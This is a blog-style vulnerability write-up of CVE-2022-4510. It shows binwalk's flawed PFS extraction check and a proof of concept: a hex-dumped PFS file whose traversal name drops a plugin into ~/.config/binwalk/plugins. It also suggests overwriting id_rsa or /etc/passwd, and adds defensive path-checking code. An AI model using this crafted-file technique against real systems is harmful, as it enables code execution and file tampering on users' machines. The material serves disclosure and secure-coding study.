Binwalk Remote Command Execution Vulnerability Principle and Demonstration CVE-2022-4510

Introduction

According to the official CVE description, a path traversal vulnerability was found in binwalk from version 2.1.2 to 2.3.3. This vulnerability allows a remote attacker to execute arbitrary code on an affected machine that has binwalk installed.

What is a PFS file

A PFS file is a selection file created by PhotoFiltre Studio, an image retouching program. It contains the coordinates used by the image editor's polygon selection tool to draw lines between the given coordinates. PFS files are stored in plain text.

PFS file format

https://lekensteyn.nl/files/pfs/pfs.txt

Source code analysis

A PFS extractor plugin was merged into binwalk in 2017, with some modifications since. The extractor function of the vulnerable versions (binwalk 2.3.3 and earlier) reads:

    def extractor(self, fname):
        fname = os.path.abspath(fname)
        out_dir = binwalk.core.common.unique_file_name(os.path.join(os.path.dirname(fname), "pfs-root"))

        try:
            with PFS(fname) as fs:  # read the PFS file metadata
                data = open(fname, 'rb')  # leftover: rebound on the next line and never closed
                data = binwalk.core.common.BlockFile(fname, 'rb')
                data.seek(fs.get_end_of_meta_data())  # file bodies follow the metadata
                for entry in fs.entries():
                    outfile_path = os.path.join(out_dir, entry.fname)  # entry.fname comes verbatim from the image; join() does not normalise "../"
                    if not outfile_path.startswith(out_dir):  # plain string-prefix test on the un-normalised path
                        binwalk.core.common.warning("Unpfs extractor detected directory traversal attempt for file: '%s'. Refusing to extract." % outfile_path)
                    else:
                        self._create_dir_from_fname(outfile_path)
                        outfile = binwalk.core.common.BlockFile(outfile_path, 'wb')
                        outfile.write(data.read(entry.fsize))
                        outfile.close()
                data.close()
        except KeyboardInterrupt as e:
            raise e

The problem is the os.path.join call on line 11: it only concatenates out_dir and entry.fname and does not normalise "../" components, so a name such as ../../../x produces a string that still begins with out_dir. The startswith condition on line 12 is a string-prefix test on that un-normalised path, so it will never be true for a traversal entry, and the file is written wherever the "../" components lead.


By crafting a PFS file whose entry names contain path-traversal sequences, we can force binwalk to write files outside the extraction directory.

PoC

binwalk's plugin API lets users define their own plugins: any plugin placed in the $HOME/.config/binwalk/plugins/ directory is loaded and called whenever binwalk runs.

Malicious code:

import binwalk.core.plugin

class MaliciousExtractor(binwalk.core.plugin.Plugin):
    def init(self):
        print("baimao")

Open the file with WinHex after saving.

Paste the following hexadecimal data directly:

5046 532f 302e 3900 0000 0000 0000 0100
2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967
2f62 696e 7761 6c6b 2f70 6c75 6769 6e73
2f6d 616c 7761 6c6b 2e70 7900 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
3412 0000 a000 0000 c100 0000


Save the .py file as a .pfs file and add it to the zip archive.


When binwalk is run from the user's home directory to extract the archive, the plugin is written into .config/binwalk/plugins; binwalk then loads and executes this malicious plugin, resulting in RCE.

cd ~
binwalk -M -e exp.zip


The plugin code executed successfully.
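To see why the extractor's startswith test passes the entry from the hex dump above, here is an added example (my own code, not binwalk's and not part of the original write-up) that parses the PFS metadata from that dump, applies the extractor's original check, a tempting but still wrong "normalise, then prefix" variant, and a component-wise check, and reports which entries each would accept. The field layout I parse (16-byte header ending in a little-endian entry count, NUL-padded name field sized by scanning up to 128 bytes, 12-byte trailer whose last two words I read as size and offset) is my reading of binwalk's unpfs plugin and should be treated as an assumption, as is the /tmp/firmware/pfs-root output directory and the extra sample names at the bottom.

```python
import os
from typing import List, Tuple

# PFS metadata copied from the write-up's hex dump (the 0xa0-byte file body that
# follows it in the real PoC archive is deliberately not reproduced here).
PFS_META = bytes.fromhex("".join([
    "5046532f302e39000000000000000100",  # "PFS/0.9\0", padding, entry count = 1 (little-endian)
    "2e2e2f2e2e2f2e2e2f2e636f6e666967",  # "../../../.config"
    "2f62696e77616c6b2f706c7567696e73",  # "/binwalk/plugins"
    "2f6d616c77616c6b2e70790000000000",  # "/malwalk.py" + NUL padding
    "00" * 80,                           # remainder of the 128-byte name field
    "34120000a0000000c1000000",          # 12-byte trailer: unused word, size 0xa0, offset 0xc1
]))

HEADER_SIZE = 16    # magic + padding + u16 entry count (assumption: mirrors the plugin)
NAME_PEEK = 128     # the plugin sizes the name field by peeking this many bytes
TRAILER_SIZE = 12   # numeric fields that follow each name


def name_field_width(first_node: bytes) -> int:
    """Width of the NUL-padded name field, derived from the first entry the way the
    plugin does it: position of the first NUL plus the run of NULs after it, capped."""
    peek = first_node[:NAME_PEEK]
    first_nul = peek.find(b"\x00")
    if first_nul == -1:
        return NAME_PEEK
    for i, b in enumerate(peek[first_nul:]):
        if b != 0:
            return first_nul + i
    return NAME_PEEK


def parse_pfs_entries(blob: bytes) -> List[Tuple[str, int, int]]:
    """Return (name, size, offset) for every metadata entry of a PFS/0.9 image."""
    if blob[:8] != b"PFS/0.9\x00":
        raise ValueError("not a PFS/0.9 image")
    num_files = int.from_bytes(blob[HEADER_SIZE - 2:HEADER_SIZE], "little")
    width = name_field_width(blob[HEADER_SIZE:])
    node_size = width + TRAILER_SIZE
    entries = []
    pos = HEADER_SIZE
    for _ in range(num_files):
        node = blob[pos:pos + node_size]
        if len(node) < node_size:
            raise ValueError("truncated PFS metadata")
        name = node[:width].rstrip(b"\x00").decode("latin-1")
        size = int.from_bytes(node[-8:-4], "little")
        offset = int.from_bytes(node[-4:], "little")
        entries.append((name, size, offset))
        pos += node_size
    return entries


def naive_is_inside(out_dir: str, name: str) -> bool:
    """The test binwalk 2.3.3 performed: a string prefix on the un-normalised join."""
    return os.path.join(out_dir, name).startswith(out_dir)


def normalised_prefix_is_inside(out_dir: str, name: str) -> bool:
    """A common but still wrong repair: normalise, then string prefix. A sibling
    directory whose name merely begins with out_dir (pfs-root-extra) still passes."""
    base = os.path.realpath(out_dir)
    return os.path.realpath(os.path.join(base, name)).startswith(base)


def hardened_is_inside(out_dir: str, name: str) -> bool:
    """Normalise, then compare whole path components rather than characters."""
    base = os.path.realpath(out_dir)
    target = os.path.realpath(os.path.join(base, name))
    return os.path.commonpath([base, target]) == base


def audit_image(blob: bytes, out_dir: str) -> List[Tuple[str, bool, bool]]:
    """Per entry: (name, accepted by the vulnerable check, accepted by the hardened check).
    A row reading (True, False) is one the 2.3.3 extractor would write outside out_dir."""
    return [(name, naive_is_inside(out_dir, name), hardened_is_inside(out_dir, name))
            for name, _size, _offset in parse_pfs_entries(blob)]


OUT_DIR = "/tmp/firmware/pfs-root"  # constructed stand-in for binwalk's pfs-root output directory

if __name__ == "__main__":
    for name, naive_ok, hard_ok in audit_image(PFS_META, OUT_DIR):
        print(f"{name!r}: vulnerable check accepts={naive_ok}, hardened check accepts={hard_ok}")
    # Constructed extra names showing where each of the three checks breaks down.
    for name in ["etc/config", "images/../../escape.txt", "/etc/passwd", "../pfs-root-extra/x"]:
        print(f"{name!r}: naive={naive_is_inside(OUT_DIR, name)} "
              f"normalised-prefix={normalised_prefix_is_inside(OUT_DIR, name)} "
              f"hardened={hardened_is_inside(OUT_DIR, name)}")
```

Running it shows the dump's single entry, ../../../.config/binwalk/plugins/malwalk.py, accepted by the original check and rejected by the component-wise one; the extra names show that the original check does catch an absolute name like /etc/passwd (the join result no longer starts with out_dir) but not "../" anywhere in the name, and that normalising before a string prefix test is not enough either. The real remedy for a deployed binwalk is a fixed release; the point of the check here is the shape of comparison an extractor needs: resolve first, then compare path components.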

Summary

The details of the CVE were disclosed on January 31 this year. After studying it, we see that besides overwriting the ./.config/binwalk/plugins/malwalk.py file, the same traversal could also overwrite files such as id_rsa or /etc/passwd to escalate privileges directly.

References:

https://nvd.nist.gov/vuln/detail/CVE-2022-4510
https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk


Source: blog.csdn.net/qq_45894840/article/details/128890375